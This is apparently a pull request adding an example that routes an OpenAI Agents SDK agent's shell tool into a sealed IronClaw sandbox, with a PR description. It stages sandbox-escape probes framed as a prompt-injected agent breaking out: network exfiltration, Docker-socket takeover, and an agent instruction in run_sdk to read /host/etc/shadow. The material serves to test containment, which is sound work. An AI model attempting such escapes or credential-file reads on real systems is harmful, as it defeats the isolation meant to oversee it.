+```
+
+## See also
+
+- [`claude-agent-sdk/`](../claude-agent-sdk/) — the same pattern for the Claude Agent SDK.
+- [`examples/live-containment`](../../live-containment/) — the escape probes, narrated.
+- [`examples/red-team-escape`](../../red-team-escape/) — the full six-assertion battery.
+- [Integrations docs](https://ironsecco.github.io/ironclaw/integrations/).

--- a/examples/integrations/openai-agents/agent.py
+++ b/examples/integrations/openai-agents/agent.py
@@ -1,0 +1,158 @@
+#!/usr/bin/env python3
+"""OpenAI Agents SDK agent whose code-execution tool runs inside an IronClaw sandbox.
+
+The value: the OpenAI Agents SDK is great at *planning* tool calls, but its tools run
+in your process, with your key in memory and open egress. Here the agent's one tool —
+``sandbox_bash`` — executes inside a real, sealed IronClaw per-session sandbox instead:
+no network card, no host filesystem, no Docker socket. Same agent you designed; a
+perimeter it never had.
+
+Two ways to run, picked automatically:
+
+* Zero-credential (default). No ``openai-agents`` install and no API key needed: we
+  drive the exact same tool function through a short scripted transcript (a "mock LLM")
+  so you can watch the sealed loop — a benign command that works, then an escape that
+  is blocked — with nothing but Python + Docker.
+* Real SDK. If ``agents`` is importable and ``OPENAI_API_KEY`` is set, the real
+  ``Runner`` plans the tool calls and the model decides when to reach for the sandbox.
+
+Either way the tool code below is genuine OpenAI Agents SDK usage.
+"""
+
+from __future__ import annotations
+
+import os
+import sys
+
+# Make the shared shim importable whether run from its dir or via run.sh (PYTHONPATH).
+sys.path.insert(0, os.path.join(os.path.dirname(__file__), ".."))
+from ironclaw_sandbox import (  # noqa: E402
+    BOLD, CYAN, DIM, GREEN, RESET, YELLOW,
+    SandboxSession, print_containment,
+)
+
+# One live sandbox backs every tool call in this run.
+_SESSION: SandboxSession | None = None
+
+
+def _session() -> SandboxSession:
+    global _SESSION
+    if _SESSION is None:
+        print(f"{DIM}==> engaging a real IronClaw sandbox (per-session container)...{RESET}")
+        _SESSION = SandboxSession.engage()
+        print(f"{DIM}    sandbox up: {_SESSION.container}{RESET}")
+    return _SESSION
+
+
+# --- the tool: genuine OpenAI Agents SDK, backed by the sandbox --------------
+# `agents` is the OpenAI Agents SDK package (pip install openai-agents). When it is not
+# installed we fall back to a no-op decorator so the SAME function is callable directly
+# by the zero-credential scripted runner below.
+try:
+    from agents import function_tool  # type: ignore
+    _HAVE_SDK = True
+except ImportError:  # zero-credential path: identity decorator, same function body
+    _HAVE_SDK = False
+
+    def function_tool(fn):  # type: ignore
+        return fn
+
+
+def _sandbox_bash_impl(command: str) -> str:
+    """Run a command inside the sealed sandbox. The raw callable used by both paths."""
+    rc, out = _session().exec(command)
+    return f"(exit {rc})\n{out}" if out else f"(exit {rc}, no output)"
+
+
+@function_tool
+def sandbox_bash(command: str) -> str:
+    """Run a shell command inside the sealed IronClaw sandbox and return its output.
+
+    Use this for ANY code or shell execution. It runs in a sandbox with no network and
+    no host access, so it is safe even for untrusted or agent-generated commands.
+    """
+    # When openai-agents is installed, function_tool wraps this into a FunctionTool that
+    # is NOT directly callable, so the scripted path calls _sandbox_bash_impl instead.
+    return _sandbox_bash_impl(command)
+
+
+def _speak_agent(text: str) -> None:
+    print(f"{BOLD}{CYAN}agent>{RESET} {text}")
+
+
+def _speak_tool(command: str, result: str) -> None:
+    print(f"{DIM}  -> sandbox_bash({command!r}){RESET}")
+    for line in result.splitlines():
+        print(f"{DIM}     {line}{RESET}")
+
+
+# --- zero-credential scripted runner (mock LLM) -----------------------------
+def run_scripted() -> int:
+    """Drive the sandbox-backed tool through a fixed transcript. No key, no SDK, no network."""
+    print(f"\n{BOLD}OpenAI Agents SDK -> IronClaw sandbox{RESET} "
+          f"{DIM}(zero-credential scripted transcript){RESET}\n")
+
+    # 1) A benign task the agent completes by executing in the box.
+    _speak_agent("I'll gather the box's identity by running a shell command in the sandbox.")
+    result = _sandbox_bash_impl("uname -a; id; echo sealed-workspace: $(pwd)")
+    _speak_tool("uname -a; id; echo sealed-workspace: $(pwd)", result)
+    _speak_agent("Done - that ran inside the sealed sandbox, not on your host.")
+
+    # 2) The agent (or a prompt injection) turns malicious. Show the box hold.
+    print(f"\n{YELLOW}Now a prompt-injected instruction makes the agent try to break out.{RESET}")
+    probes = _session().containment_report()
+    ok = print_containment(probes)
+
+    _session().close()
+    print()
+    if ok:
+        print(f"{GREEN}{BOLD}PASS{RESET} - the agent's tool ran real code in a sandbox that "
+              f"a jailbroken agent could not escape.")
+        return 0
+    print("FAIL - an escape was not contained (see above).")
+    return 1
+
+
+# --- real OpenAI Agents SDK runner ------------------------------------------
+def run_sdk() -> int:
+    """Let the real OpenAI Agents SDK Runner plan tool calls against the sandbox."""
+    from agents import Agent, Runner  # type: ignore
+
+    agent = Agent(
+        name="Sandboxed Operator",
+        instructions=(
+            "You are a careful operator. Use the sandbox_bash tool for ALL shell/code "
+            "execution - never assume you can run commands any other way. First report "
+            "the box's identity (uname, id, working dir). Then, to demonstrate isolation, "
+            "attempt to resolve api.anthropic.com and read /host/etc/shadow, and report "
+            "plainly that both are blocked by the sandbox."
+        ),
+        tools=[sandbox_bash],
+        model=os.environ.get("OPENAI_MODEL", "gpt-4o-mini"),
+    )
+    result = Runner.run_sync(
+        agent, "Show me this environment and prove it is isolated.")
+    print(f"\n{BOLD}{CYAN}agent final>{RESET} {result.final_output}")
+
+    # Always print the deterministic containment table too - proof, not just prose.
+    probes = _session().containment_report()
+    ok = print_containment(probes)
+    _session().close()
+    return 0 if ok else 1
+
+
+def main() -> int:
+    use_sdk = _HAVE_SDK and os.environ.get("OPENAI_API_KEY")
+    if use_sdk:
+        print(f"{DIM}==> OpenAI Agents SDK detected + OPENAI_API_KEY set: real runner.{RESET}")
+        return run_sdk()
+    if not _HAVE_SDK:
+        print(f"{DIM}==> openai-agents not installed: zero-credential scripted transcript.{RESET}")
+        print(f"{DIM}    (pip install openai-agents and set OPENAI_API_KEY for the real runner.){RESET}")
+    else:
+        print(f"{DIM}==> OPENAI_API_KEY unset: zero-credential scripted transcript.{RESET}")
+    return run_scripted()
+
+
+if __name__ == "__main__":
+    raise SystemExit(main())

--- a/examples/integrations/openai-agents/run.sh
+++ b/examples/integrations/openai-agents/run.sh
@@ -1,0 +1,16 @@
+#!/usr/bin/env bash
+# openai-agents — an OpenAI Agents SDK agent whose code-execution tool runs inside a
+# real, sealed IronClaw sandbox. One command, zero credentials by default.
+#
+#   examples/integrations/openai-agents/run.sh            # build + up + run + tear down
+#   examples/integrations/openai-agents/run.sh --keep     # leave the demo running
+#   examples/integrations/openai-agents/run.sh --attach   # use a running control-plane
+#
+# Default path needs nothing but Docker + python3 (stdlib): a scripted transcript drives
+# the sandbox-backed tool with the offline mock provider. For the real SDK runner:
+#   pip install openai-agents && export OPENAI_API_KEY=sk-...
+set -euo pipefail
+SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
+AGENT_PY="$SCRIPT_DIR/agent.py"
+# shellcheck source=../_driver.sh
+source "$SCRIPT_DIR/../_driver.sh"


### PR DESCRIPTION
## What

Two runnable integration examples under `examples/integrations/`, each an agent SDK whose **code/bash tool executes inside a real, sealed IronClaw per-session sandbox** instead of the host:

- `openai-agents/` — OpenAI Agents SDK `function_tool` backed by the sandbox
- `claude-agent-sdk/` — Claude Agent SDK bash tool backed by a sandbox session

## How the shim works

`ironclaw_sandbox.py` — shared, **stdlib-only** plumbing (no pip deps for the default path):

1. **Engages a real sandbox** — one chat to the demo `mock-agent` launches that conversation's per-session container (`ic-sbx-*`).
2. **Exposes one dangerous capability, sealed** — `SandboxSession.exec(command)` runs the command *inside* that container as uid 65532 (the exact privilege a jailbroken agent would have). That is what each SDK's tool calls.
3. **Proves containment** — reuses the `live-containment` escape probes (network exfil, host-fs read, Docker-socket takeover) and prints each verdict.

## Acceptance criteria

- [x] **Single documented command** per example (`run.sh`), zero-cred by default (offline mock provider + scripted transcript), real SDK runner when the package + API key are present.
- [x] **Real sandbox for execution** — benign command runs inside `ic-sbx-*` as uid 65532.
- [x] **Real escape attempt blocked, printed clearly** — 3/3 escapes `BLOCKED`; non-zero exit if any leaks (doubles as a CI smoke).
- [x] **README**: 3-line value prop + copy-paste snippet, per example + a family index.
- [x] **Wired into** `examples/` index + docs integrations nav (`openai-agents-sdk.md`, `claude-agent-sdk.md`).

## Verification (macOS + colima, real sandbox)

Both examples run end-to-end, exit 0:

```
sandbox up: ic-sbx-ses_e8eeab2d4b8fb223
  -> sandbox_bash('uname -a; id; ...')  (exit 0)  uid=65532(nonroot) ... /workspace
CONTAINMENT: 3/3 escape attempts DENIED. The box held.
PASS
```

## Security lenses

- **Isolation / egress**: read-only demonstration reusing existing containment probes; introduces no new sandbox capability or egress path. The tool `exec`s into the *existing* per-session container — it does not widen queue access or the trust boundary.
- **Secret hygiene**: zero-cred by default; real-SDK path keeps the model key **host-side** (documented), never in the sandbox.

Coordinated example dir layout (`examples/integrations/*`) per the issue. QA to smoke; Growth to expand matching SEO pages (nav slot + concise pages already in place).